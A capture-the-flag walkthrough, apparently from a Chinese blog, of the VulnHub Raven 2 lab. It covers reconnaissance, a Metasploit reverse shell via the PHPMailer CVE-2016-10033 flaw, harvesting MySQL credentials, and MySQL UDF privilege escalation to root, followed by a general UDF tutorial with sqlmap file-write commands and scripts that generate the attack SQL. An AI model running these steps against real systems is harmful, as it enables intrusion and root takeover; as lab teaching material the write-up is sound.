VulnHub target machine walkthrough: RAVEN: 2


Preface

      Difficulty: Medium. The goal is to capture four flags. Download the OVA file from https://www.vulnhub.com/entry/raven-2,269/; this article opens it in VirtualBox. Knowledge points covered: building the target environment, directory scanning with dirsearch, .DS_Store information leakage, WordPress scanning with wpscan, getting a shell through the PHPMailer remote command execution vulnerability, and MySQL UDF privilege escalation.
      Target machine address: 192.168.56.107
      Kali address: 192.168.56.108


1. Install the target machine

     1) Select File > Import Appliance.
     2) Select the path of the downloaded RAVEN: 2 OVA file.
     3) Click Import; the virtual machine is installed into a new, empty folder.
     4) Open Host Network Manager.
     5) Configure the host-only adapter manually.
     6) Enable and configure the DHCP server.
     7) Set adapter 1 of both the target machine and Kali to Host-only mode, so that they share the 192.168.56.0/24 segment.
     8) Set Kali's adapter 2 to NAT mode, since Internet access is sometimes needed (wpscan, for example, updates its vulnerability database online).

2. Web part

     1) Use nmap to sweep the network segment for the target IP. 192.168.56.107 answers and is taken to be the target machine. Note: 192.168.56.100 is the address of the VirtualBox DHCP server configured above.

	# -sn: ping scan only, no port scan
	# -PE: host discovery with ICMP echo requests
	# -n: no reverse DNS resolution
	nmap -sn -PE -n 192.168.56.0/24
     2) Use nmap to scan the ports. The results are as follows:

	# -A: OS and version detection, default scripts and traceroute
	# -T4: faster timing template
	# -p-: all 65535 TCP ports
	nmap -A -T4 -p- 192.168.56.107
     3) First browse port 80 and run dirsearch against it, then click around the site. Clicking BLOG leads to a WordPress site; make a note of that for later.
     4) The directory scan returns many paths; check them one by one.
     5) Directory listing is enabled on http://192.168.56.107/vendor/ (a directory index, not a path traversal), and the first flag is in the PATH file there.
     6) The readme in the same directory names PHPMailer, and the VERSION file shows 5.2.16. PHPMailer is a PHP library for sending e-mail directly from PHP without running a full mail service, and it has a known remote command execution vulnerability. Note the version and test for that vulnerability later.
     7) A .DS_Store file is also exposed, although it leaks nothing useful here. A tool for parsing it: https://github.com/lijiejie/ds_store_exp.
     8) http://192.168.56.107/wordpress/wp-login.php is the WordPress login page, although the site itself does not render properly.
     9) Run wpscan, the WordPress vulnerability scanner that ships with Kali, to check for known vulnerabilities. Note that wpscan needs an Internet connection (hence the NAT adapter). It turns up a lot of information, but nothing that yields access.
     10) Return to the PHPMailer information collected earlier. A search shows that PHPMailer has a known vulnerability, so look for it in Metasploit: search returns two modules; info 0 and info 1 describe them, and the first one fits, since it targets PHPMailer below 5.2.18 (CVE-2016-10033) and the version found here, 5.2.16, is lower than that.

# in msfconsole
search phpmailer
info 0
use 0

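The version comparison in this step, as an added example that is not part of the original article: the script below fetches /vendor/VERSION from the target and classifies the PHPMailer build. Builds below 5.2.18 are affected by the mail() argument-injection bug the Metasploit module exploits (CVE-2016-10033); 5.2.18 and 5.2.19 received an incomplete fix (CVE-2016-10045, fixed in 5.2.20), so anything below 5.2.20 is worth testing. The target URL and the sample VERSION text are assumptions.

```python
# Added example (not from the original article): fetch /vendor/VERSION from the
# target and classify the PHPMailer build. The target URL and the sample text
# are assumptions; the thresholds are the public fix versions.
import re
import urllib.request

# First fixed releases for the two PHPMailer mail()-argument-injection CVEs.
FIXES = [
    ((5, 2, 18), "CVE-2016-10033"),   # below 5.2.18: the bug the Metasploit module uses
    ((5, 2, 20), "CVE-2016-10045"),   # 5.2.18 / 5.2.19: bypass of the first fix
]

def parse_version(text):
    """Return the first dotted version in a VERSION file body as a tuple, or None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None

def classify(text):
    """Name the CVE a build is exposed to, or None if it is 5.2.20 or later."""
    version = parse_version(text)
    if version is None:
        return None
    for fixed_in, cve in FIXES:
        if version < fixed_in:
            return cve
    return None

def phpmailer_vulnerable(text):
    """True when the VERSION text names a build older than 5.2.20."""
    return classify(text) is not None

def fetch_version(base_url, timeout=5):
    """Download <base_url>/vendor/VERSION; needs network access to the target."""
    url = base_url.rstrip("/") + "/vendor/VERSION"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")

if __name__ == "__main__":
    sample = "5.2.16\n"   # constructed: what Raven 2's VERSION file contained
    print(sample.strip(), "->", classify(sample))
    # Live check against the lab target (assumed URL):
    # print(classify(fetch_version("http://192.168.56.107")))
```

Run it as-is for the offline sample; uncomment the last line to check the live target. The VERSION file is plain text, so the regex takes the first dotted triple it finds.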
     11) Load the module and look at the options it requires.
     12) Set the options as the module requires: the target IP, the page with the mail (contact form) function, and the absolute path of the web root. Checking the options shows that LHOST, the address the reverse shell connects back to, defaulted to the 10.x address of Kali's NAT adapter because Kali has two adapters; set it to Kali's host-only address, 192.168.56.108, which the target can reach. The ports are left at their defaults.

	options
	set RHOSTS 192.168.56.107	  # target machine address
	set TARGETURI /contact.php    # page with the mail function
	set WEB_ROOT /var/www/html    # absolute path of the web root
	set payload php/meterpreter/reverse_tcp	  # payload
	set LHOST 192.168.56.108     # Kali address (host-only adapter)
	run
     13) The module writes a PHP backdoor with a random name (YNz20r0P.php here) into the web root; append the name to the site URL and request it to trigger the reverse shell. It works, but it is slow.

http://192.168.56.107/YNz20r0P.php
     14) flag2.txt is in /var/www.
     15) The meterpreter commands are clumsy for this, so drop into a plain shell. Searching for all flags from /var/www turns up flag3, a PNG in the WordPress uploads directory; build its URL and open it in the browser.

find ./ -name "flag*"
http://192.168.56.107/wordpress/wp-content/uploads/2018/11/flag3.png
     16) Use a Python one-liner to spawn an interactive pty shell.

python -c 'import pty; pty.spawn("/bin/bash")'
     17) Then search for configuration files; four show up, check them one by one.

	find ./ -name "*fig*"
     18) wp-config.php holds the MySQL credentials: root / R@v3nSecurity.

	cat html/wordpress/wp-config.php
     19) Log in to the database with these credentials (passing the password on the command line is fine in a lab, but it ends up in the shell history and in process listings).

	mysql -uroot -pR@v3nSecurity

3. Privilege escalation part

     1) MySQL's user-defined function (UDF) mechanism can be abused for privilege escalation when mysqld runs as root and file export is unrestricted; this is not tied to a particular MySQL version, although the plugin-directory requirement described below applies from 5.1 on. Check how mysqld runs: ps shows the mysqld process running as root. Check secure_file_priv: it is empty, so file export is unrestricted and the UDF route is open.

# in the shell:
ps aux | grep mysql                 # which user runs mysqld
# in the mysql client:
select version();                   # MySQL version
select @@basedir;                   # MySQL installation directory
show variables like '%basedir%';    # MySQL installation directory
show variables like '%secure%';     # where files may be exported to (secure_file_priv)

     2) From MySQL 5.1 on, the UDF shared library must be in the server's plugin directory (lib/plugin under the installation directory) before CREATE FUNCTION will load it. sqlmap and Metasploit both ship ready-made libraries for each system. The plugin directory here is /usr/lib/mysql/plugin/. The version_compile_os and version_compile_machine variables show which OS and architecture the server was built for, which decides whether the 32- or 64-bit .so or .dll is needed (on Windows, the library's bitness must match the mysqld binary, not the operating system).

show variables like '%plugin%';    # plugin directory
show variables like '%compile%';   # OS and architecture the server was built for
     3) All conditions for UDF privilege escalation are met, so use Exploit-DB 1518. Locate 1518.c in Kali's local exploit database and copy it to a working directory (a new directory or the desktop both work).

searchsploit 1518.c   # search for 1518.c
locate 1518.c         # find where it is stored locally
cp /usr/share/exploitdb/exploits/linux/local/1518.c .  # copy it to the current directory
     4) Compile it with gcc into 1518.so. Build on a machine whose architecture and C library match the target, or the library will fail to load; if the link fails with a relocation error on x86-64, add -fPIC.

# options: -g: include debugging information
#          -shared: build a shared library (inputs may be source, assembly or object files)
#          -o: output file name
#          -lc: link against the C library
#          -Wl,<opt>: pass <opt> to the linker
#          -soname: the shared object name recorded in the library
gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc
     5) Transfer the .so file to /tmp on the target: start a simple HTTP server on Kali with Python's http.server module, then in the shell on the target change to /tmp and fetch 1518.so with wget.
     6) Log back in to MySQL and register the function with the following statements.

# connect to MySQL
mysql -uroot -pR@v3nSecurity
# switch to the mysql database
use mysql;
# create a staging table foo
create table foo(line blob);
# insert the binary 1518.so into foo
insert into foo values(load_file('/tmp/1518.so'));
# export 1518.so into the plugin directory
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
# create the do_system user-defined function from it
create function do_system returns integer soname '1518.so';
# call do_system: set the SUID bit on find so that it runs as its owner, root
select do_system('chmod u+s /usr/bin/find');
# after the import, confirm that do_system now appears in mysql.func:
select * from mysql.func;
     7) Use find's -exec to run whoami: it reports root, because find is now SUID root. The first argument, 11, is just an existing file used as the starting point; any existing path such as . works the same. (This works because /bin/sh on Debian is dash, which keeps the effective UID; bash would drop it unless started with -p.)

find 11 -exec "whoami" \;
find 11 -exec "/bin/sh" \;

     8) The find command yields a root shell; search for flag4.

4. Extra: MySQL privilege escalation via UDF

1. Prerequisites for UDF privilege escalation

     1) secure_file_priv must be empty (no restriction). If it is NULL, file import and export are disabled altogether; if it names a directory such as /tmp/, files can only be written below that directory, so the library cannot be placed in the plugin directory and the technique fails.
     2) The database user needs the CREATE and FILE privileges (root has all privileges by default).
     3) On Linux, the plugin directory must be writable by the MySQL server process.
     4) On Linux, UDF privilege escalation is largely confined to lab and CTF environments: with normal permissions, neither the mysql user nor the web user can write to the plugin directory.

# show the privileges of the current database user
select * from mysql.user where user = substring_index(user(), '@', 1)\G
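As an added example that is not part of the original article, the checks listed here and in the privilege escalation part above (who runs mysqld, secure_file_priv, the user's privileges, the plugin directory and which library to pick) can be made mechanical. The script below takes the output of ps aux and the relevant SHOW VARIABLES and mysql.user rows, supplied here as constructed samples; whether the plugin directory is actually writable has to be tested on the host and is passed in as a flag.

```python
# Added example (not from the original article): decide whether the UDF
# privilege escalation preconditions hold, from data gathered over the shell
# (ps aux) and the MySQL session (SHOW VARIABLES, mysql.user). The samples
# below are constructed to mirror the Raven 2 walkthrough, not real output.

def mysqld_runs_as_root(ps_output):
    """True if a mysqld server process in `ps aux` output is owned by root.
    The mysqld_safe wrapper always runs as root and is deliberately ignored:
    only the process that will load the UDF matters."""
    for line in ps_output.splitlines():
        cols = line.split()
        if len(cols) < 11:
            continue
        user, command = cols[0], cols[10]   # USER ... COMMAND columns of ps aux
        if command.rsplit("/", 1)[-1] == "mysqld" and user == "root":
            return True
    return False

def secure_file_priv_allows(value, target_dir):
    """secure_file_priv semantics: '' means no restriction, NULL disables all
    file import/export, and a directory restricts writes to paths below it."""
    if value is None or value.upper() == "NULL":
        return False
    if value == "":
        return True
    allowed = value.rstrip("/") + "/"
    return (target_dir.rstrip("/") + "/").startswith(allowed)

def user_has_privs(user_row):
    """CREATE FUNCTION needs CREATE on mysql.*, the library write needs FILE."""
    return user_row.get("File_priv") == "Y" and user_row.get("Create_priv") == "Y"

def pick_library(variables):
    """Choose the sqlmap/Metasploit library matching the *server* build; on
    Windows the bitness must match mysqld, not the OS (errno 193 otherwise)."""
    machine = variables.get("version_compile_machine", "").lower()
    os_name = variables.get("version_compile_os", "").lower()
    bits = "64" if ("64" in machine or "64" in os_name) else "32"
    ext = "dll" if os_name.startswith("win") else "so"
    return f"lib_mysqludf_sys_{bits}.{ext}"

def udf_preconditions(ps_output, variables, user_row, plugin_dir_writable):
    """Return (ok, reasons). plugin_dir_writable must be tested on the host
    (e.g. by creating a file in the plugin directory); it cannot be inferred here."""
    plugin_dir = variables.get("plugin_dir", "")
    reasons = []
    if not mysqld_runs_as_root(ps_output):
        reasons.append("mysqld does not run as root")
    if not secure_file_priv_allows(variables.get("secure_file_priv"), plugin_dir):
        reasons.append("secure_file_priv blocks writes to " + plugin_dir)
    if not user_has_privs(user_row):
        reasons.append("database user lacks FILE or CREATE privilege")
    if not plugin_dir_writable:
        reasons.append("plugin directory is not writable")
    return (not reasons, reasons)

# Constructed samples (not real output from the target).
PS_SAMPLE = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root       550  0.0  0.1   4336  1612 ?        S    10:01   0:00 /bin/sh /usr/bin/mysqld_safe
root       894  0.1  8.4 557812 42796 ?        Sl   10:01   0:02 /usr/sbin/mysqld --basedir=/usr
"""
VARS_SAMPLE = {
    "secure_file_priv": "",
    "plugin_dir": "/usr/lib/mysql/plugin/",
    "version_compile_machine": "x86_64",
    "version_compile_os": "debian-linux-gnu",
}
USER_SAMPLE = {"User": "root", "File_priv": "Y", "Create_priv": "Y"}

if __name__ == "__main__":
    ok, reasons = udf_preconditions(PS_SAMPLE, VARS_SAMPLE, USER_SAMPLE, plugin_dir_writable=True)
    print("UDF escalation possible:", ok, reasons)
    print("library to use:", pick_library(VARS_SAMPLE))
```

The mysqld_safe line is skipped on purpose: it is the root-owned wrapper that the text above warns about, and seeing it in ps says nothing about the privileges of the server process itself.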


2. Find the dynamic link library

     1) On Windows, MySQL generally runs as SYSTEM, so UDF privilege escalation mostly arises from a leaked or weak root password, or from ordinary users having write access to folders such as plugin.
     2) On Linux, the server process mysqld normally runs under a dedicated mysql account, while the mysqld_safe wrapper runs as root; UDF escalation is therefore rarer on Linux, and only works when mysqld itself runs as root.
     3) From MySQL 5.1 on, the library must sit in the plugin directory (lib/plugin under the installation directory) before a custom function can be created from it. sqlmap and Metasploit both ship libraries for each system, but sqlmap's copies are encoded to avoid antivirus detection and cannot be used directly; decode them with the cloak.py tool that ships with sqlmap.
     4) sqlmap's UDF library location:

  <sqlmap root directory>/data/udf/mysql

     The location of cloak.py:

  <sqlmap root directory>/extra/cloak/cloak.py
     The decoding method is as follows:

# decode the 32-bit Linux library
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so

# decode the 64-bit Linux library
python3 cloak.py -d -i ../../data/udf/mysql/linux/64/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so

# decode the 32-bit Windows library
python3 cloak.py -d -i ../../data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

# decode the 64-bit Windows library
python3 cloak.py -d -i ../../data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll

     5) Metasploit's UDF libraries live under the framework's data directory:

  <metasploit-framework root directory>/data/exploits/mysql  (on Kali: /usr/share/metasploit-framework/data/exploits/mysql)

     The libraries that come with Metasploit are not encoded and can be used directly.

3. Find the plugin location

     1) The UDF library has to go into MySQL's plugin directory. Once logged in to MySQL, query its location:

	show variables like '%plugin%';

     2) If the directory does not exist, find the MySQL installation directory (select @@basedir;) and create lib\plugin by hand from the webshell. Without a webshell, on Windows the directory can be created through MySQL itself by writing to the ::$INDEX_ALLOCATION alternate data stream of the path, which NTFS treats as creating a directory:

select 233 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation';
     3) When lib\plugin exists and you have a webshell, upload the UDF file directly. When lib\plugin exists but there is no webshell, write the UDF file through MySQL as a hexadecimal literal.

4. Write the dynamic link library

     1) Writing the library splits into the following cases. The first: SQL injection with high privileges, a plugin directory writable by the MySQL user, and no secure_file_priv restriction. Then sqlmap can upload the library directly; since GET requests have a length limit, this usually only works through POST injection.

# --file-write=<local file path>
# --file-dest=<destination path on the target>
sqlmap -u "http://localhost:30008/" --data="id=1" --file-write="/Users/sec/Desktop/lib_mysqludf_sys_64.so" --file-dest="/usr/lib/mysql/plugin/udf.so"
     2) Without injection but with direct SQL access, and secure_file_priv unrestricted, the file can be written to the plugin directory by hand as a hexadecimal literal:

# write the library bytes as a hexadecimal literal with SELECT ... INTO DUMPFILE
SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

     The hexadecimal form can be produced with MySQL's own hex() function:

# pass the path as a normal string
SELECT hex(load_file('/lib_mysqludf_sys_64.so'));

# or hex-encode the path as well (no quotes needed)
SELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));
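As an added example that is not part of the original article, the script below generates the hex-literal write, the CREATE FUNCTION and the verification statements described in this section (the manual counterpart of the load_file()/dumpfile sequence used against Raven 2 in the privilege escalation part). The library bytes are a constructed stand-in beginning with the ELF magic, not a real UDF, and the function and file names are assumptions.

```python
# Added example (not from the original article): build the SQL statements that
# write a UDF library into the plugin directory as a hex literal and register
# a function from it. The library bytes are a constructed stand-in (ELF magic
# header only); sys_eval / udf.so are assumed names.

ELF_MAGIC = b"\x7fELF"

def hex_literal(data):
    """MySQL hexadecimal literal, e.g. b'\\x7fELF' -> '0x7f454c46'."""
    return "0x" + data.hex()

def sql_quote(s):
    """Escape a path for use inside a single-quoted MySQL string literal."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"

def dumpfile_statement(data, dest_path):
    # SELECT ... INTO DUMPFILE writes the raw bytes of a single value with no
    # quoting or line terminator; it refuses to overwrite an existing file and
    # cannot append, so one statement must carry the whole library and
    # max_allowed_packet bounds how large that statement may be.
    return f"SELECT {hex_literal(data)} INTO DUMPFILE {sql_quote(dest_path)};"

def create_function_statement(func_name, soname, returns="STRING"):
    return f"CREATE FUNCTION {func_name} RETURNS {returns} SONAME {sql_quote(soname)};"

def load_file_hex_statement(path):
    # hex(load_file(0x...)): the path itself is a hex literal, so the statement
    # needs no quotes at all (useful where quotes are filtered in an injection).
    return f"SELECT hex(load_file({hex_literal(path.encode())}));"

def build_udf_script(library, plugin_dir, func_name="sys_eval", soname="udf.so", command="id"):
    """Full sequence: write the library, register the function, verify, execute."""
    dest = plugin_dir.rstrip("/") + "/" + soname
    return [
        dumpfile_statement(library, dest),
        create_function_statement(func_name, soname),
        "SELECT name, dl FROM mysql.func;",
        f"SELECT {func_name}({sql_quote(command)});",
    ]

def validate_library(data, expect_windows=False):
    """Cheap sanity check before pushing bytes: ELF header on Linux, MZ on Windows."""
    return data.startswith(b"MZ") if expect_windows else data.startswith(ELF_MAGIC)

if __name__ == "__main__":
    sample_lib = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9   # constructed stand-in, not a real UDF
    assert validate_library(sample_lib)
    for stmt in build_udf_script(sample_lib, "/usr/lib/mysql/plugin/"):
        print(stmt)
    print(load_file_hex_statement("/lib_mysqludf_sys_64.so"))
```

To use it against a real library, read the decoded .so or .dll with open(path, "rb").read() in place of the stand-in; the path-encoding helper reproduces the hex literal shown in the previous block.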

     3) The error below means the library could not be loaded. In this case lib_mysqludf_sys_64.dll failed while lib_mysqludf_sys_32.dll worked: errno 193 is Windows' ERROR_BAD_EXE_FORMAT, so the DLL's bitness has to match the mysqld binary rather than the operating system, and the MySQL bundled with PHPStudy is 32-bit.

ERROR 1126 (HY000): Can't open shared library 'udf.dll' (errno: 193 )

5. Create the custom function and run commands

     1) Run the following in MySQL (udf.so instead of udf.dll on Linux):

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

     2) After a successful import, check that sys_eval appears in mysql.func.

select * from mysql.func;

     3) System commands can now be run through the function; on Windows, where MySQL runs as SYSTEM, they run with the highest privileges.

select sys_eval('whoami');

6. Delete the custom function

     1) Remove the function with the following statement when done, and delete the library from the plugin directory.

	drop function sys_eval;


Origin blog.csdn.net/qq_44029310/article/details/126491848